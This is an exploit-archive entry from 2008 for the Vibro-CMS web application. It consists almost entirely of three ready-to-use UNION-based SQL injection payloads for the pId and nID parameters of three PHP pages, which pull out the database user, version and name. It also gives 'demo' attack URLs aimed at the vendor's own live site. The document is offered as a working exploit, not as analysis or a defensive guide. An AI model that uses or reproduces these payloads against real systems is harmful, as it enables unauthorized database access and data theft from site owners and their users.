Vibro-CMS Multiple Remote SQL Injection Vulnerabilities

2008-11-04T00:00:00
ID 1337DAY-ID-4055
Type zdt
Reporter StAkeR
Modified 2008-11-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
=======================================================


/*
   -------------------------------------------------------
   Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
   -------------------------------------------------------
   Discovered By StAkeR
   http://www.niclor.net/prodotti/Vibro-CMS
   -------------------------------------------------------

   * Remote SQL Injection
   * Note: Works Regardless PHP.ini Settings
   
   - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
   - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
   - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
   
   * Demo
   
   - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
   - http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
   - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
   
   

*/



#  0day.today [2018-03-01]  #